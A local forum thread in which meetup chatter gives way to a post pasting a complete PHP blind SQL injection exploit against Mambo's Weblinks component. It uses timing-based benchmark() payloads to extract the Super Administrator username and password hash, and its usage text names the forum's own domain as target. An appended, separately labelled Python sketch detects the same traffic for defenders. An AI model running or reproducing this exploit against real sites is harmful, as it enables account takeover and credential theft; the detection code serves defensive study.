BSC Kragujevac Forum
TOPIC: Hi everyone !!!!

#7
Saskica ()
Re: Hi everyone !!!! 2008/03/21 08:36
Friends, see you at the certificate award ceremony on the 25th at Dom omladine.

#8
ekonomista ()
Re: Hi everyone !!!! 2008/03/21 16:02
Of course. Starting at 19:00. Shall we meet somewhere a bit earlier, like last time, so we can all burst in together? I'll ask the others who don't come to the forum and let you know.

#9
Saskica ()
Re: Hi everyone !!!! 2008/03/22 09:03
OK. That would be great. I'm in touch with Vlada and Bilja from Sunce, so I'll pass it on to them.

: )

#10
masi ()
Re: Hi everyone !!!! 2008/10/23 10:55
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "Mambo <= 4.6rc1 'Weblinks' blind SQL injection / admin credentialsrn";
echo "disclosure exploit (benchmark() vesion)rn";
echo "by rgod sima@autistici.orgrn";
echo "site: http://hackernews.org";
echo "this is called the Sun-Tzu 'trascendental guru meditation' tecniquernrn";

if ($argc<5) {
echo "Usage: php ".$argv[0]." host path user pass OPTIONSrn";
echo "host: target server (ip/hostname)rn";
echo "path:http://sr.bsckragujevac.org/administrator";
echo "user/pass:admin";
echo "Options:rn";
echo " -T[prefix] specify a table prefix different from 'mos_'rn";
echo " -p[port]: specify a port other than 80rn";
echo " -P[iport]: specify a proxyrn";
echo "Example:rn";
echo "php ".$argv[0]." http://sr.bsckragujevac.org/administrator/Admin";
die;
}


error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="rn"; $exa.="rn";}
}
return $exa."rn".$result;
}
$proxy_regex = '(bd{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5}b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...rn";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
#debug
#echo "rn".$html;
}

function is_hash($hash)
{
if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
else {return false;}
}

$host=$argv[1];
$path=$argv[2];
$user=$argv[3];
$pass=$argv[4];
$port=80;
$prefix="mos_";
$proxy="";
for ($i=5; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
if ($temp=="-T")
{
$prefix=str_replace("-T","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

$data ="username=".$user;
$data.="&passwd=".$pass;
$data.="&remember=yes";
$data.="&option=login";
$data.="&Submit=login";
$data.="&op2=login";
$data.="〈=english";
$data.="&return=".urlencode("http://".$host.$path);
$data.="&message=0";
$packet ="POST ".$p." HTTP/1.0rn";
$packet.="Host: ".$host."rn";
$packet.="Accept: text/plainrn";
$packet.="Connection: Closern";
$packet.="Content-Type: application/x-www-form-urlencodedrn";
$packet.="Content-Length: ".strlen($data)."rnrn";
$packet.=$data;
sendpacketii($packet);
$temp=explode("Set-Cookie: ",$html);
$cookie="";
for ($i=1; $i<=count($temp)-1; $i++)
{
$temp2=explode(" ",$temp[$i]);
$cookie.=" ".$temp2[0];
}
if ((strstr($cookie,"=+;")) | $cookie=="") {die("Unable to login...");}
else
{
echo "Done...rncookie -> ".$cookie."rn";
}

$j=1;$admin="";
while (!strstr($admin,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
$starttime=time();
$sql="99999' UNION SELECT IF ((ASCII(SUBSTRING(username,".$j.",1))=".$i.") & 1, benchmark(200000000,CHAR(0)),0) FROM ".$prefix."users WHERE usertype='Super Administrator'/*";
echo "rn".$sql."rn";
$sql=urlencode($sql);
$data ="title=".$sql;
$data.="&catid=2";
$data.="&url=http://www.google.com";
$data.="&description=";
$data.="&id=0";
$data.="&option=com_weblinks";
$data.="&task=save";
$data.="&ordering=0";
$data.="&approved=0";
$data.="&Returnid=0";
$packet ="POST ".$p."index.php HTTP/1.0rn";
$packet.="User-Agent: Googlebot/2.1rn";
$packet.="Host: ".$host."rn";
$packet.="Accept: text/plainrn";
$packet.="Connection: Closern";
$packet.="Content-Type: application/x-www-form-urlencodedrn";
$packet.="Cookie: ".$cookie."rn";
$packet.="Content-Length: ".strlen($data)."rnrn";
$packet.=$data;
//debug
//echo quick_dump($packet)."rn";
sendpacketii($packet);
$endtime=time();
echo "endtime -> ".$endtime."rn";
$difftime=$endtime - $starttime;
echo "difftime -> ".$difftime."rn";
if ($difftime > 7) {$admin.=chr($i);echo "admin -> ".$admin."[???]rn";sleep(2);break;} //more than seven seconds? we succeed...
if ($i==255) {die("Exploit failed...");}
}
$j++;
}

$md5s[0]=0;//null
$md5s=array_merge($md5s,range(48,57)); //numbers
$md5s=array_merge($md5s,range(97,102));//a-f letters
//print_r(array_values($md5s));
$j=1;$password="";
while (!strstr($password,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
if (in_array($i,$md5s))
{
$starttime=time();
$sql="99999' UNION SELECT IF ((ASCII(SUBSTRING(password,".$j.",1))=".$i.") & 1, benchmark(200000000,CHAR(0)),0) FROM ".$prefix."users WHERE usertype='Super Administrator'/*";
echo "rn".$sql."rn";
$sql=urlencode($sql);
$data ="title=".$sql;
$data.="&catid=2";
$data.="&url=http://www.google.com";
$data.="&description=";
$data.="&id=0";
$data.="&option=com_weblinks";
$data.="&task=save";
$data.="&ordering=0";
$data.="&approved=0";
$data.="&Returnid=0";
$packet ="POST ".$p."index.php HTTP/1.0rn";
$packet.="User-Agent: Googlebot/2.1rn";
$packet.="Host: ".$host."rn";
$packet.="Accept: text/plainrn";
$packet.="Connection: Closern";
$packet.="Content-Type: application/x-www-form-urlencodedrn";
$packet.="Cookie: ".$cookie."rn";
$packet.="Content-Length: ".strlen($data)."rnrn";
$packet.=$data;
//debug
//echo quick_dump($packet)."rn";
sendpacketii($packet);
$endtime=time();
echo "endtime -> ".$endtime."rn";
$difftime=$endtime - $starttime;
echo "difftime -> ".$difftime."rn";
if ($difftime > 7) {$password.=chr($i);echo "password -> ".$password."[???]rn";sleep(2);break;}
}
if ($i==255) {die("Exploit failed...");}
}
$j++;
}
//if you are here...
echo "Exploit succeeded...rn";
echo "--------------------------------------------------------------------rn";
echo "admin -> ".$admin."rn";
echo "password (md5) -> ".$password."rn";
echo "--------------------------------------------------------------------rn";
?>

Post edited by: masi, at: 2008/10/23 10:56

Post edited by: masi, at: 2008/10/23 11:00

Post edited by: masi, at: 2008/10/23 11:01
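
Added example, not part of the original post or of Mambo: a detection sketch for the traffic the script in post #10 generates, namely POSTs with `option=com_weblinks`, `task=save` and a `title` field carrying `UNION SELECT ... benchmark(`, sent with a crawler User-Agent and a session cookie, where a slow response marks the guess that matched. The record layout (`src`, `ua`, `has_session`, `secs`, `body`) and the sample records are constructed for illustration; the 7-second threshold mirrors the script's own.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlencode

# SQL constructs the posted script puts in the weblink "title" field.
SQLI_MARKERS = re.compile(r"union\s+select|benchmark\s*\(|substring\s*\(|/\*", re.I)
SLOW_SECS = 7  # the script reads a response slower than this as a matched guess


def inspect_request(body):
    """Return the reasons a urlencoded POST body looks like this probe."""
    form = parse_qs(body, keep_blank_values=True)
    if form.get("option") != ["com_weblinks"] or form.get("task") != ["save"]:
        return []
    title = form.get("title", [""])[0]
    found = sorted({m.group(0).lower() for m in SQLI_MARKERS.finditer(title)})
    return ["sql in title: " + ", ".join(found)] if found else []


def summarize(records):
    """Per client: probe count, slow (matched) responses, crawler UA with a session."""
    per_src = defaultdict(lambda: {"probes": 0, "slow": 0, "bot_ua_with_session": False})
    for rec in records:
        if not inspect_request(rec["body"]):
            continue
        stats = per_src[rec["src"]]
        stats["probes"] += 1
        stats["slow"] += int(rec["secs"] > SLOW_SECS)
        if "googlebot" in rec["ua"].lower() and rec["has_session"]:
            stats["bot_ua_with_session"] = True
    return dict(per_src)


def _body(title):  # constructed form body with the fields the script posts
    return urlencode({"title": title, "catid": "2", "option": "com_weblinks", "task": "save"})


# Constructed sample records (documentation IP ranges), not real traffic.
PROBE = "99999' UNION SELECT IF ((ASCII(SUBSTRING(username,1,1))={}) & 1, benchmark(200000000,CHAR(0)),0) FROM mos_users/*"
SAMPLE = [
    {"src": "203.0.113.5", "ua": "Googlebot/2.1", "has_session": True, "secs": 0.2, "body": _body(PROBE.format(96))},
    {"src": "203.0.113.5", "ua": "Googlebot/2.1", "has_session": True, "secs": 9.1, "body": _body(PROBE.format(97))},
    {"src": "198.51.100.7", "ua": "Mozilla/5.0", "has_session": True, "secs": 0.3, "body": _body("Local chamber of commerce")},
]

if __name__ == "__main__":
    for src, stats in summarize(SAMPLE).items():
        print(src, stats)
```

A client with many probes and a handful of slow responses, one per recovered character, is the signature to alert on; an ordinary weblink submission produces no entry at all.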